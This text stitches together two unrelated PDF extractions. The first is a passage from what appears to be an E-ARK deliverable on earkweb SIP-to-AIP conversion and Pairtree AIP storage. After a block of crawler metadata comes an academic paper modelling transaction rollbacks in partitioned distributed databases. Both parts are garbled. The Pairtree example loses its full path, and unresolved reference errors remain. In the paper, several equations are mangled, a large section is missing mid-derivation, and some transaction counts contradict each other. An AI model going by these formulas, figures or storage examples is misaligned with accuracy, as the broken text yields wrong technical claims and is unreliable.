The TAR or ZIP container file of an SIP is uploaded together with the SIP delivery XML document from the local file system to the SIP reception area.
Note that the package must be in TAR or ZIP format and the basenames of the package file and delivery XML (METS format) file must be equal (e.g. PACKAGE.tar and PACKAGE.xml).
### 6.2.1.1 SIP to AIP conversion tasks
The SIP to AIP conversion process interface allows executing SIP creation tasks:
- **SIPtoAIPReset** - Rollback to initial state (as after handover from SIP creation or uploading the SIP)
- **SIPDeliveryValidation** - Validate delivery (especially checksum information)
- **IdentifierAssignment** - Assign identifier
- **SIPExtraction** - Extract SIP
- **SIPRestructuring** - Restructure SIP according to AIP format
- **SIPValidation** - Validate SIP
- **AIPMigrations** - Do migrations according to predefined rules (e.g. PDF to PDF/A)
• AIPCheckMigrationProgress - Check if migrations are finished
• CreatePremisAfterMigration - Create PREMIS file after migrations completed
• AIPRepresentationMetsCreation - Create representation METS files
• AIPPackageMetsCreation - Create AIP METS and PREMIS
• AIPValidation - Validate package
• AIPPackaging - Create package container file
• AIPStore - Store AIP package in file system storage area (pairtree storage)
• AIPIndexing - Index AIP
• LilyHDFSUpload - Upload AIP to public search server
6.2.1.2 SIP to AIP conversion task execution
The tasks in the pull-down menu near the label "Tasks" appear in the logical order in which they should be executed.
The "SIP to AIP task/workflow execution" overview table shows the information entities of the package. Note that some information entities, such as "identifier" might appear only after a specific task ("IdentifierAssignment" in this case), was executed.
• The "Process ID" is a UUID which corresponds to the name of the working area directory.
• The "Package name" is the name of the SIP which is the outcome of the current SIP creation process.
• The package Identifier is the PUID of the AIP. Although of type UUID in the reference implementation, this could be any other type of identifier, such as a DOI or PURL.
• The "Working area path" is a link which allows accessing the working area directory of the corresponding package to see the result of a task execution.
• The "Last task" shows the last task which was executed, e.g. "AIPValidation". The last task also determines the subsequent task which can be executed because each task defines a list of accepted input tasks.
• Last change is the date/time of the last modification (by a task).
• Process status shows the consistency status of a package. If the process status shows the value "Success (0)" together with a green "check mark" symbol, then the status of the package is consistent.
If an error occurred during processing, the process status shows the value "Error (1)" together with a green "warning triangle" symbol.
Selected information and error log messages appear in the "Process log" and "Error log" areas, more detailed information about the processing might be available in the earkweb processing log which is available in the package.
Use the "SIPtoAIPReset" task to roll-back package processing to the initial state in case an error occurred during processing (after applying required modifications).
6.2.1.3 Active SIP to AIP conversion processes
By accessing the sub-menu item "Active SIP to AIP conversion processes", an overview about open SIP to AIP conversion processes is shown. Each package is identified by the package name (column 'Package name') which corresponds to the name of the SIP container. The process identifier is also used as the name of the working directory where information package transformations take place (column 'SIP creation working directory').
Depending on the last task that was executed, subsequent transformation tasks can be applied.
6.2.1.4 Indexing and search in AIPs
The "AIPIndexing" task allows indexing the AIP TAR package created the SIP to AIP conversion process. The AIP is indexed according to the location in the pairtree storage. In that way the search results can offer a link to directly render individual content items.
6.2.1.5 AIPs in pairtree storage
The storage backend used in the Standalone Software Stack\(^{40}\) of *earkweb* is based on the Python-based *Pairtree File System* implementation\(^{41}\) of the *Pairtrees for Collection Storage* specification\(^ {42}\). It is used to store the physical representation of the AIP in a conventional file system as opposed to the Hadoop Distributed File System which is used in the Revised Cluster Software Stack described in Deliverable D6.3.
In summary, the *Pairtree* is a filesystem hierarchy for storing digital objects where the unique identifier string of the object is mapped to a unique directory path so that the file system location of the object can be derived from the identifier string. Basically, the identifier string is split each two characters at a time and the object folder has by definition more than two characters. Furthermore, the specification defines a mapping of special characters to a set of alternative characters in order to ensure file system level interoperability.
The following example will explain how the *Pairtree* storage method is used in the *earkweb* implementation.
According to the default *earkweb* configuration, the path to the storage directory in the file system is:
```
/var/data/earkweb/storage
```
The storage folder contains an empty file called “*pairtree_version0_1*” which specifies the version of the *Pairtree* specification.
The storage directory contains the root folder of the *Pairtree* storage:
```
/var/data/earkweb/storage/pairtree_root
```
Let us assume that an AIP has the following identifier
```
urn:uuid:6c496473-4e77-44f5-b387-25bffd362789
```
Following the method defined by the *Pairtree* specification, this identifier is mapped to the following path:
```
urn/n+/uu/id/+6/c4/96/47/3-/4e/77/-4/4f/5/-b3/87/-2/5b/ff/d3/62/78/9
```
and the actual AIP container file is stored in a “data” folder which represents the leaf node of the *Pairtree* file system hierarchy.
The leaf node contains one or possibly more sub-directories (5-digits fixed length zero-filled number) for the versions of the AIP.
---
\(^{40}\) In contrast to the cluster software stack, the standalone software stack does not include a big data backend based on Apache Hadoop.
\(^{41}\) https://pypi.python.org/pypi/Pairtree
\(^{42}\) https://wiki.ucop.edu/display/Curation/PairTree?preview=/14254128/16973838/PairtreeSpec.pdf
The full path to the AIP file is as follows (to be read as a single line string):
+6c496473-4e77-44f5-b387-25bffd362789.tar
Note that the colon characters ("\(\):\) which are part of the URN identifier to separate the leading "urn" sequence from the namespace identifier ("uuid") and the latter from the namespace-specific string ("6c496473-4e77-44f5-b387-25bffd362789") were mapped to the plus character ("+"). This is because the Pairtree character mapping rules apply to the filename of the physical container as well to ensure file system interoperability.
The purpose of the Pairtree storage backend is to allow a large number of AIPs\(^{43}\) to be stored in a conventional file system, such as Network Attached Storage, for example, and allow fast access to individual files by directly reading content streams from the files stored in the TAR packaged AIP container files.
If the AIP is changed, because, for example, a new representation was added to the AIP, a new physical container will be created as a new version of the AIP. As a result, only the numerical folder will be incremented (00002) and the identifier for the intellectual entity remains the same (426087e8-0f79-11e3-847a-34e6d700c47b):
+6c496473-4e77-44f5-b387-25bffd362789.tar
6.2.1.6 Parent-child AIP relations
During AIP creation, it is possible to assign parent-child relationships between AIPs, as described in D4.4 part A. Figure 8 illustrates how the creation of packages governed by a parent-child relationship can be achieved:
1. The submission of a package is processed up to the point where the identifier of the parent AIP ("parentID") is created (operation "submitParentSIP").
2. This SIP to AIP creation process remains open until the last child AIP is created.
\(^{43}\) No concrete numbers will be given here about what a "large number of AIPs" means in this context, as the requirements regarding scalability of indexing and access procedures depend on various factors, such as the environment (hardware and network) and the type of collection data to be stored in the repository. It is a matter of evaluating the Standalone Software Stack (cf. section Error! Reference source not found.) using scalability tests to find out if it can cope with the given scalability requirements, or if the Cluster Software Stack (cf. section Error! Reference source not found.) is needed.
3. A sequence of child SIPs can then be submitted and created as child-AIPs by indicating the parent identifier (“parentID”) generated previously.
4. After the last child-AIP is processed, the parent-AIP is created (operation “createParentAIP”) by indicating which child-AIPs belong to the AIP (“childs”).
5. Finally, the consistency of the logical AIP composition is verified and the parent-AIP (“parent”) and all child-AIPs (“childs”) are stored (operation “storeAIP”).
Figure 8: Parent-child aggregation submission process
|
{"Source-Url": "https://cris.brighton.ac.uk/ws/portalfiles/portal/4712213/E_ARK_D4.4.2.pdf", "len_cl100k_base": 8959, "olmocr-version": "0.1.50", "pdf-total-pages": 32, "total-fallback-pages": 0, "total-input-tokens": 63043, "total-output-tokens": 10218, "length": "2e13", "weborganizer": {"__label__adult": 0.0002894401550292969, "__label__art_design": 0.000774383544921875, "__label__crime_law": 0.00047206878662109375, "__label__education_jobs": 0.00276947021484375, "__label__entertainment": 0.00015461444854736328, "__label__fashion_beauty": 0.0001538991928100586, "__label__finance_business": 0.0007739067077636719, "__label__food_dining": 0.0002522468566894531, "__label__games": 0.0005698204040527344, "__label__hardware": 0.0013141632080078125, "__label__health": 0.0002872943878173828, "__label__history": 0.00124359130859375, "__label__home_hobbies": 0.00015532970428466797, "__label__industrial": 0.0004589557647705078, "__label__literature": 0.0004091262817382813, "__label__politics": 0.00035262107849121094, "__label__religion": 0.00032901763916015625, "__label__science_tech": 0.08612060546875, "__label__social_life": 0.00018203258514404297, "__label__software": 0.09796142578125, "__label__software_dev": 0.80419921875, "__label__sports_fitness": 0.0001807212829589844, "__label__transportation": 0.0003745555877685547, "__label__travel": 0.0002536773681640625}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 40266, 0.03095]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 40266, 0.39975]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 40266, 0.80593]], "google_gemma-3-12b-it_contains_pii": [[0, 819, false], [819, 1103, null], [1103, 2488, null], [2488, 3868, null], [3868, 5210, null], [5210, 6775, null], [6775, 7116, null], [7116, 8956, null], [8956, 10011, null], [10011, 11228, null], [11228, 13848, null], [13848, 15282, null], [15282, 15664, null], [15664, 16750, null], [16750, 17707, null], [17707, 20419, null], [20419, 23175, null], [23175, 24743, null], [24743, 25792, null], [25792, 26343, null], [26343, 26932, null], [26932, 27315, null], [27315, 28142, null], [28142, 29570, null], [29570, 30322, null], [30322, 31364, null], [31364, 33282, null], [33282, 34292, null], [34292, 34689, null], [34689, 37108, null], [37108, 39738, null], [39738, 40266, null]], "google_gemma-3-12b-it_is_public_document": [[0, 819, true], [819, 1103, null], [1103, 2488, null], [2488, 3868, null], [3868, 5210, null], [5210, 6775, null], [6775, 7116, null], [7116, 8956, null], [8956, 10011, null], [10011, 11228, null], [11228, 13848, null], [13848, 15282, null], [15282, 15664, null], [15664, 16750, null], [16750, 17707, null], [17707, 20419, null], [20419, 23175, null], [23175, 24743, null], [24743, 25792, null], [25792, 26343, null], [26343, 26932, null], [26932, 27315, null], [27315, 28142, null], [28142, 29570, null], [29570, 30322, null], [30322, 31364, null], [31364, 33282, null], [33282, 34292, null], [34292, 34689, null], [34689, 37108, null], [37108, 39738, null], [39738, 40266, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 40266, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 40266, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 40266, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 40266, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 40266, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 40266, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 40266, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 40266, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 40266, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 40266, null]], "pdf_page_numbers": [[0, 819, 1], [819, 1103, 2], [1103, 2488, 3], [2488, 3868, 4], [3868, 5210, 5], [5210, 6775, 6], [6775, 7116, 7], [7116, 8956, 8], [8956, 10011, 9], [10011, 11228, 10], [11228, 13848, 11], [13848, 15282, 12], [15282, 15664, 13], [15664, 16750, 14], [16750, 17707, 15], [17707, 20419, 16], [20419, 23175, 17], [23175, 24743, 18], [24743, 25792, 19], [25792, 26343, 20], [26343, 26932, 21], [26932, 27315, 22], [27315, 28142, 23], [28142, 29570, 24], [29570, 30322, 25], [30322, 31364, 26], [31364, 33282, 27], [33282, 34292, 28], [34292, 34689, 29], [34689, 37108, 30], [37108, 39738, 31], [39738, 40266, 32]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 40266, 0.13681]]}
|
olmocr_science_pdfs
|
2024-12-01
|
2024-12-01
|
f0bbf2cb0888bb65495220373ecb4288f7f3afdb
|
EFFECTS OF DISTRIBUTED DATABASE MODELING ON EVALUATION OF TRANSACTION ROLLBACKS
Ravi Mukkamala
Department of Computer Science
Old Dominion University
Norfolk, Virginia 23529-0162.
ABSTRACT
Data distribution, degree of data replication, and transaction access patterns are key factors in determining the performance of distributed database systems. In order to simplify the evaluation of performance measures, database designers and researchers tend to make simplistic assumptions about the system. In this paper, we investigate the effect of modeling assumptions on the evaluation of one such measure, the number of transaction rollbacks. In a partitioned database system, we develop six probabilistic models and develop expressions for the number of rollbacks that are each of these models. Essentially, the models differ in terms of the available system information. The analytical results obtained are compared to results from simulation. From here, we conclude that most of the probabilistic models yield overly conservative estimates of the number of rollbacks. The assumption of transaction commutativity on system throughput is also grossly undermined when such models are employed.
1. INTRODUCTION
A distributed database system is a collection of cooperating nodes each containing a set of data items. In this paper, the basic unit of access in a database is referred to as a data item. A user transaction can enter such a system at any node. When a transaction needs to communicate with other nodes, it is initiated by a receiving node, sometimes referred to as the coordinating or initiating node, which undertakes the task of locating the nodes that contain the data items required by the transaction.
A partitioning of a distributed database (DBD) occurs when the nodes in the network split into groups of communicating nodes due to node or communication link failures. The nodes in each group can communicate with each other, but no node in one group is able to communicate with nodes in other groups. We refer to such a group as a partition. The algorithms which allow a partitioned DBD to continue functioning generally fall into one of two classes [Davidson et al., 1985]. Those in the first class can take a pessimistic approach and process only those transactions in a partition which do not conflict with transactions in other partitions, ensuring consistent data when partitions are reunited. The algorithms in the second class allow every group of nodes in a partitioned DBD to perform new updates. Since this may result in dependent updates to items in different partitions, conflicts among transactions are bound to occur, and the databases of the partitions will clearly diverge. Therefore, they require a strategy for conflict detection and resolution. Usually, rollbacks are used as a means for preserving consistency; conflicting transactions are rolled back when partitions are reunited. Since coordinating the undoing of transactions is a very difficult task, these methods are called optimistic since they are used primarily in a situation where the number of transactions in a partitioned database is large and the probability of conflicts among transactions is small.
In general, determining if a transaction that successfully executed in a partition is rolled back at the time the database is merged depends on a number of factors. Data items in the read-set and the write-set of the transaction, the distribution of these data items among the other partitions, access patterns of transactions in other partitions, data dependencies among the transactions, and semantic relation (if any) between these transactions are some examples of these factors. Exact evaluation of rollback probability for all transactions in a database (and hence the evaluation of the number of rolled back transactions) generally involves both analysis and simulation, and requires large execution times [Davidson 1982; Davidson 1984]. To overcome the computational complexities of evaluation, designers and researchers generally resort to approximation techniques [Davidson 1982; Davidson 1986; Wright 1983a; Wright 1983b]. These techniques reduce the computation time by making simplifying assumptions to represent the underlying distributed system. The time complexity of the resulting techniques greatly depends on the assumed model as well as evaluation techniques.
In this paper we are interested in determining the effect of the distributed database models on the computational complexity and accuracy of the rollback statistics in a partitioned database. The balance of this paper is outlined as follows. Section 2 formally defines the problem under consideration. In Section 3, we discuss the data distribution, replication, and transaction modeling. Section 4 derives the rollback statistics for one distribution model. In Section 5, we compare the analysis methods for five models and simulation method for one model based on computational complexity, space complexity, and accuracy of the measure. Finally, in Section 6, we summarize the obtained results.
2. PROBLEM DESCRIPTION
Even though a transaction \( T_i \) in partition \( P_i \) may be rolled back (at merging time) by another transaction \( T_j \) in partition \( P_j \) due to a number of reasons, the following two cases are found to be the major contributors [Davidson 1982].
i. \( P_i \neq P_j \) and there is at least one data item which is updated by both \( T_i \) and \( T_j \). This is referred to as a write-write conflict.
ii. \( P_i = P_j \) and \( T_i \) is rolled back, and it is a dependency parent of \( T_j \) (i.e., \( T_j \) has read at least one data item updated by \( T_i \) and \( T_j \) occurs prior to \( T_i \) in the serialization sequence).
The above discussion on reasons for rollback only considers the syntax of transactions (i.e. read- and write-sets) and does not recognize any semantic relation between them. To be more specific, let us consider transactions \( T_i \) and \( T_j \) executed in two different partitions \( P_i \) and \( P_j \) respectively. Let us also assume that the intersection between the write-sets of \( T_i \) and \( T_j \) is non-empty. Clearly, by the above definition, there is a write-write conflict and one of the two transactions has to be rolled back. However, if \( T_i \) and \( T_j \) commute with each other, then there is no need to rollback either of the transactions at the time of partition merge [Garcia-Molina 1983; Jajodia and Speckman 1988; Jajodia and Mukkamala 1990]. Instead, \( T_i \) needs to be executed in \( P_i \) and \( T_j \) needs to be executed in \( P_j \). The analysis in this paper take this property into account.
In order to compute the number of rollbacks, it is also necessary to define some ordering (\( O(P) \)) on the partitions. For example, if \( T_i \) and \( T_j \) correspond to case (i) above, and do not commute, it is necessary to determine which of these two are rolled back at the time of merging. Partition ordering resolves this ambiguity by the following role: Whenever two conflicting but non-commuting transactions are executed in two different partitions, then the transaction executed in the lower order partition is rolled back.
Since a transaction may be rolled back due to either (i) or (ii), we classify the rollbacks into two classes: Class 1 and Class 2 respectively. The problem of estimating the number of rollbacks at the time of partition merging in a partially replicated distributed database system may be formulated as follows.
Given the following parameters, determine the number of rolled back transactions in class 1 ($R_1$) and class 2 ($R_2$).
• n, the number of nodes in the database;
• d, the number of data items in the database;
• p, the number of partitions in the distributed system (prior to merge);
• t, the number of transaction types;
• $GD_t$, the global data directory that contains the location of each of the d data items; the GD matrix has $d$ rows and $n$ columns, each of which is either 0 or 1;
• $NS_k$, the set of nodes in partition $k$, $\forall k = 1, 2, \ldots, p$;
• $RS_j$, the read-set of transaction type $j$, $j = 1, 2, \ldots, t$;
• $WS_j$, the write-set of transaction type $j$, $j = 1, 2, \ldots, t$;
• $N_{jk}$, the number of transactions of type $j$ received in partition $k$ (prior to merge), $j = 1, 2, \ldots, t$, $k = 1, 2, \ldots, p$;
• $CM_j$, the commutativity matrix that defines transaction commutativity. If $CM_{jk} = 1$ then transaction types $j_1$ and $j_2$ commute. Otherwise they do not commute.
The average number of total rollbacks is now expressed as $R = R_1 + R_2$.
3. MODEL DESCRIPTION
As stated in the introduction, the primary objective of this paper is to investigate the effect of data distribution, replication, and transaction models on estimation of the number of rollbacks in a distributed database system.
To describe a data distribution-transaction model, we characterize it with three orthogonal parameters:
1. Degree of data item replication (or the number of copies).
2. Distribution of data item copies.
3. Transaction characterization
We now discuss each of these parameters in detail.
For simplicity, several analysis techniques assume that each data item has the same number of copies (or degree of replication) in the database system [Coffman et al. 1981]. Some other techniques characterize the degree of replication of a database by the average degree of replication of data items in that database [Davidson 1988]. Others treat the degree of replication of each data item independently.
Some designers and analysts assume some specific allocation schemes for data item (or group) copies (e.g., [Mukkamala 1987]). Assuming complete knowledge of data copy distribution ($GD$) is one such assumption. Depending on the type of allocation, such assumptions may simplify the performance analysis. Others assume that each data item copy is randomly distributed among the nodes in the distributed system [Davidson 1988].
Many database analysts characterize a transaction by the size of its read-set and its write-set. Since different transactions may have different sizes, these are either classified based on the sizes, or an average read-set size and average write-set size are used to represent a transaction. Others, however, classify transactions based on the data items that they access (and not necessarily on their size). In this case, transaction types are identified with their expected sizes and the group of data items from which these are accessed. An extreme example is a case where each transaction in the system is identified completely by its read-set and its write-set.
With these three parameters, we can describe a number of models. Due to the limited space, we chose to present the results for six of these models in this paper.
We chose the following six models based on their applicability in the current literature, and their close resemblance to practical systems. In all these models, the rate of arrival of transactions at each of the nodes is assumed to be completely known a priori. We also assume complete knowledge of the partitions (i.e. which nodes are in which partitions) in all the models.
Model 1: Among the six chosen models, this has the maximum information about data distribution, replication, and transactions in the system. It captures the following information.
• Replication: Data replication is specified for each data item.
• Data distribution: The distribution of data items among the nodes in the system is represented as a distribution matrix (as described in Section 2).
• Transactions: All distinct transactions executed in a system are represented by their read-sets and write-sets. Thus, for a given transaction, the model knows which data items are read, and which data items are updated. The commutativity information is also completely known and is expressed as a matrix (as described in Section 2).
Model 2: This model reduces the number of transactions by combining them into a set of transaction types based on commutativity, commonalities in data access patterns, etc. Since the transactions are now grouped, some of the individual characteristics of transactions (e.g. the exact read-set and write-set) are lost. This model has the following information.
• Replication: Average degree of replication is specified at the system level.
• Data distribution: Since the read- and write-set information is not retained for each transaction type, the data distribution information is also summarized in terms of average data items. It is assumed that the data copies are allocated randomly to the nodes in the system.
• Transactions: A transaction type is represented by its read-set size, write-set size, and the number of data items from which selection for read and write is made. Since two transaction types might access the same data item, it also stores this overlap information for every pair of transaction types. The commutativity information is stored for each pair of transaction types.
Model 3: This model further reduces the transaction types by grouping them based only on commutativity characteristics. No consideration is given to commonalities in data access pattern or differing read-set and write-set sizes. It has the following information.
• Replication: Average degree of replication is specified at the system level.
• Data distribution: As in model 2, it is assumed that the data copies are allocated randomly to the nodes in the system.
• Transactions: A transaction type is represented by the average read-set size and average write-set size. The commutativity information is stored for all pairs of transaction types.
Model 4: This model classifies transactions into three types: read-only, read-write, and others. Read-only trans-
actions commute among themselves. Read-write transactions neither commute among themselves nor commute with others. The others class corresponds to update transactions that may or may not commute with transactions in their own class. This fact is represented by a commute probability assigned to it.
- **Replication**: Average degree of replication is specified at the system level.
- **Data distribution**: As in model 2, it is assumed that the data copies are allocated randomly to the nodes in the system.
- **Transactions**: Read-only class is represented by average read-set size. The read-write class is represented by average read-set and write-set sizes. The others class is represented by the average read-set size, average write-set size and the probability of commutation.
Model 5: This model reduces the transactions to two classes: read-only and read-write. Read-only transactions commute among themselves. The read-write transactions corresponds to update transactions that may or may not commute with transactions in their own class. This fact is represented by a commute probability assigned to it.
- **Replication**: Average degree of replication is specified at the system level.
- **Data distribution**: As in model 2, it is assumed that the data copies are allocated randomly to the nodes in the system.
- **Transactions**: Read-only class is represented by average read-set size. The read-write class is represented by average read-set and write-set sizes, and the probability of commutation.
Model 6: This model identifies read-only transactions and other update transactions. But these two types have the same average read-set size. Update transactions may or may not commute with other update transactions.
- **Replication**: Average degree of replication is specified at the system level.
- **Data distribution**: As in model 2, it is assumed that the data copies are allocated randomly to the nodes in the system.
- **Transactions**: The read-set size of a transaction is denoted by its average. For update transactions, we also associate an average write-set size and the probability of commutation.
Among these, model 1 is very general, and assumes complete information of data distribution (GD), replication, and transactions. Other models assume only partial (or average) information about data distribution and replication. Model 1 has the most information and model 6 has the least.
### 4. Computation of the Averages
Several approaches offer potential for computing the average number of rollbacks for a given system environment; the most prominent methods are simulation and probabilistic analysis.
Using simulation, one can generate the data distribution matrix (GD) based on the data distribution and replication policies of the given model. Similarly, one can generate different transactions (of different types) that can be received at the nodes in the network. Since the partition information is completely specified, by searching the relevant columns of the GD matrix, it is possible to determine whether a given transaction has been successfully executed in a given partition. Once all the successful transactions have been identified, and their data dependencies are identified, it is possible to identify the transactions that need to be rolled back at the time of merging. The generation and evaluation process may have to be repeated enough number of times to get the required confidence in the final result.
Probabilistic analysis is especially useful when interest is confined to deriving the average behavior of a system from a given model. Generally, it requires less computation time. In this paper, we present detailed analysis for model 6, and a summary of the analysis for models 1-5.
#### 4.1 Derivations for Model 6
This model considers only two transaction types: read-only (Type 1) and read-write (Type 2). Both have the same average read-set size of \( c \). A read-write transaction updates \( w \) of the data items that it reads. \( N_{1a} \) and \( N_{2a} \) represent the rate of arrival of types 1 and 2 respectively at partition \( k \). The average degree of replication of a data item is given as \( c \). The system has \( n \) nodes and \( d \) data items. The probability that two read-write transactions commute is \( m \).
Let us consider an arbitrary transaction \( T_i \) received at one of the nodes in partition \( k \) with \( n_k \) nodes. Since the copies of a data item are randomly distributed among the \( n \) nodes, the probability that a single data item is accessible in partition \( k \) is given by
\[
\alpha_k = 1 - \left( 1 - \frac{c}{d} \right)^{n_k}
\]
Since each data item is independently allocated, the expected number of data items available in this partition is \( d \alpha_k \). Similarly, since \( T_i \) accesses \( r \) data items (on the average), the probability that it will be successfully executed is \( \alpha_k^r \). From here, the number of successful transactions in \( k \) is estimated as \( \alpha_k^r N_{1a} \) and \( \alpha_k^r N_{2a} \) for types 1 and 2 respectively.
In computing the probability of rollback of \( T_i \) due to case (i), we are only interested in transactions that update a data item in the write-set of \( T_i \) and not commuting with \( T_i \). The probability that a given data item (updated by \( T_i \)) is not updated in another partition \( k' \) by a non-commuting transaction (with respect to \( T_i \)) is given by
\[
\beta_{k'} = \left( 1 - \frac{w}{d \alpha_k} \right)^{n_k}
\]
Given that a data item is available in \( k \), probability that it is not available in \( k' \) is given as
\[
\gamma(k, k') = \left( \frac{c}{d} \right)^{n_k} - \left( \frac{c}{d} \right)^{n_k}
\]
From here, the probability that a data item available in \( k \) is not updated any other transaction in higher order partitions is given as
\[
\delta_k = \prod_{w' \in \mathcal{D}(k') \cup \mathcal{D}(k)} \left[ \gamma(k, k') + (1 - \gamma(k, k')) \beta_{k'} \right]
\]
The probability that transaction \( T_i \) is not in write-write conflict with any other non-commuting transaction of higher-order partitions is now given as
\[
\mu_k = \frac{\delta_k}{\delta_k}
\]
From here, the number of transactions rolled back due to category (i) may be expressed as \( \delta_k = \sum_{w'} (1 - \mu_k) N_{1a} \).
To compute the rollbacks of category (ii), we need to determine the probability that \( T_i \) is rolled back due to the rollback of a dependency parent in the same partition. If \( T_j \) is a read-write transaction in partition \( k \), then the probability that \( T_j \) depends on \( T_i \) (i.e. read-write conflict) is given by:
Thus, the least complex.
We discuss the space complexity of the six evaluation methods:
- Model 1 requires $O(dn)$ to store the data distribution matrix, $O(n)$ to store the partition information, $O(dt)$ to store the data access information, and $O(nt)$ to store the transaction information. It also requires $O(t^2)$ to store the commutativity information. Thus, it requires $O(nt + d n + t^2)$ space.
- Models 2-6 require similar information: $O(t)$ to store the average size of read- and write- sets of transaction types, $O(nt)$ for transaction arrival, $O(n)$ for partition information, and $O(t)$ for commit information. Thus they require $O(nt)$ space.
- Model 3, in addition to the space required by models 4-6, also requires $O(t^2)$ for commutativity matrix. Thus it requires $O(nt + t^2)$ space.
- Model 2, in addition to the space required by model 3, also requires $t^2$ space to store the data overlap information. Thus, it requires $O(nt + t^2)$ storage.
Thus, model 1 has the largest storage requirement and model 6 has the least.
5.3 Evaluation of the Averages
In order to compare the effect of each of these models on the evaluation of the average rollbacks, we have run a number of experiments. In addition to the analytical evaluations for models 1-6, we have also run simulations with Model 1. The results from these runs are summarized in Tables 1-7. Basically these tables describe the number of transactions successfully executed before partition merge (Before Merge), number of rollbacks due to class $1 (R_1)$, rollbacks due to class 2 ($R_2$), and transactions considered to be successful at the completion of merge (After Merge). Obviously, the last term is computed from the earlier three terms. In all these tables, the total number of transaction arrivals into the system during partitioning is taken to be 65000. Also, each node is assumed to receive equal share of the incoming transactions.
Table 1 summarizes the effect of number of partitions as measured with Models 1-6. Here, it is assumed that each of the data items in the system has exactly $c = 3$ copies.
The other assumptions in models 1-6 are as follows:
1. Model 1 considers 130 transaction types in the system. Each is described by its read- and write-sets and whether it commutes with the other transactions. 90 of the 130 are read-only transactions. The rest of the 40 are read-write. Among the read-write, 15 commute with each other, another 10 commute with each other, and the rest of the 15 do not commute at all. The simulation run takes the same inputs but evaluates the averages by simulation.
2. Model 2 maps the 130 transaction types into 4 classes. To make the comparisons simple, the above four classes (90+15+10+15) are taken as four types. The data overlap is computed from the information provided in model 1.
3. Model 3, to facilitate comparison of results, considers the above 4 classes. This model, however, does not capture the data overlap information.
4. Model 4 considers three types: read-only, read-write that commute among themselves with some probability, and read-write that do not commute at all.
5. Model 5 considers read-only transactions with read-set size of 3 and read-write transactions with read-set size of 6. Read-write transactions commute with a given probability.
6. Model 6 only considers the average read-set size (computed as 4 in our case), the portion of read-write transactions (45/130), and the average write-set size for a read-write (2). Probability that any two transactions commute is taken to be 0.6.
From Table 1 it may be observed that:
- The analytical results from analysis of Model 1 is a close approximation of the ones from simulation.
- The average number of successful transactions prior to the merge is well approximated by all the models. Model 6 deviated the most.
- The difference in estimations of $R_1$ and $R_2$ is significant across the models. Model 1 is closest to the
simulation. Model 6 has the worst accuracy. Model 5, surprisingly, is somewhat better than Models 2, 3, 4, and 6.
- The estimation of $R_1$ from models 2-6 is about 50 times the estimation from Model 1. The estimations from Model 1 and the simulation are quite close. From here, we can see that, Models 2-6 yield overly conservative estimates of the number of rollbacks at the time of partition merge. While Model 1 estimated the rollbacks as 1200, Model 2-6 have approximated them as about 13000.
- This difference in estimations seems to exist even when the number of partitions is increased.
Table 2 summarizes the effect of number of copies on the evaluation accuracies of the models. It may be observed that
- The difference between evaluations from Model 1 and the others is significant at low ($c = 3$) as well as high ($c = 8$) values of $c$. Clearly, the difference is more significant at high degrees of replication.
- The case $p_1 = 4, p_2 = 6, c = 8$ corresponds to a case where each of the 50 data items is available in both the partitions. This is also evident from the fact that all the six 5000 input transactions are successful prior to the merge.
- The results from the analysis and simulation of Model 1 are close to those from simulation.
Table 3 shows the effect of increasing the number of nodes from 10 (in Table 1) to 20. For large values of $n$, all the six models result in good approximations of successful transactions prior to merge. The differences in estimations of $R_1$ and $R_2$ still persist.
Table 4 compares models 5 and 6. While model 6 only retains average read-set size information for any transaction, model 5 keeps this information for read-only and read-write transactions separately. This additional information enabled model 5 to arrive at better approximations for $R_1$ and $R_2$. In addition, the effect of commutativity on $R_1$ and $R_2$ is not evident until $m \geq 0.99$. This is counterintuitive. The simplistic nature of the models is the real cause of this observation. Thus, even though these models have resulted in conservative estimates of $R_1$ and $R_2$, we cannot draw any positive conclusions about the effect of commutativity on the system throughput.
- The comments that were made about the conservative nature of the estimates from models 5 and 6 also applies to model 2. These results are summarized in Table 5. Even though this model has much more system information than models 5 and 6, the results ($R_1$, and $R_2$) are not very different. However, the effect of commutativity can now be seen at $m \geq 0.95$.
- Having observed that the effect of commutativity is almost lost for smaller values of $m$ in models 2-6, we will now look at its effect with model 1. These results are summarized in Table 6. Even at small values of $m$, the effect of commutativity on the throughput is evident. In addition, it increases with $m$. This observation holds at both small and large values of $c$.
- In Table 7, we summarize the effect of variations in number of copies. In Tables 1-6, we assumed that each data item has exactly the same number of copies. This is more relevant to Model 1. Thus we only consider this model in determining the effect of copy variations on evaluation of $R_1$ and $R_2$. As shown in this table, the effect is significant. As the variation in number of copies increased, the number of successful transactions prior to merge decreases. Hence, the number of conflicts are also reduced. This results in a reduction of $R_1$ and $R_2$. As long as the variations are not very significant, the differences are also not significant.
6. CONCLUSIONS
In this paper, we have introduced the problem of estimating the number of rollbacks in a partitioned distributed database system. We have also introduced the concept of transaction commutativity and described its effect on transaction rollbacks. For this purpose, the data distribution, replication, and transaction characterization aspects of distributed database systems have been modeled with three parameters. We have investigated the effect of six distinct models on the evaluation of the chosen metric. These investigations have resulted in some very interesting observations. This study involved developing analytical equations for the averages, and evaluating them for a range of parameters. We also used simulation for one of these models. Due to lack of space, we could not present all the obtained results in this paper. In this section, we will summarize our conclusions from these investigations.
We now summarize these conclusions.
- Random data models that assume only average information about the system result in very conservative estimates of system throughput. One has to be very cautious in interpreting these results.
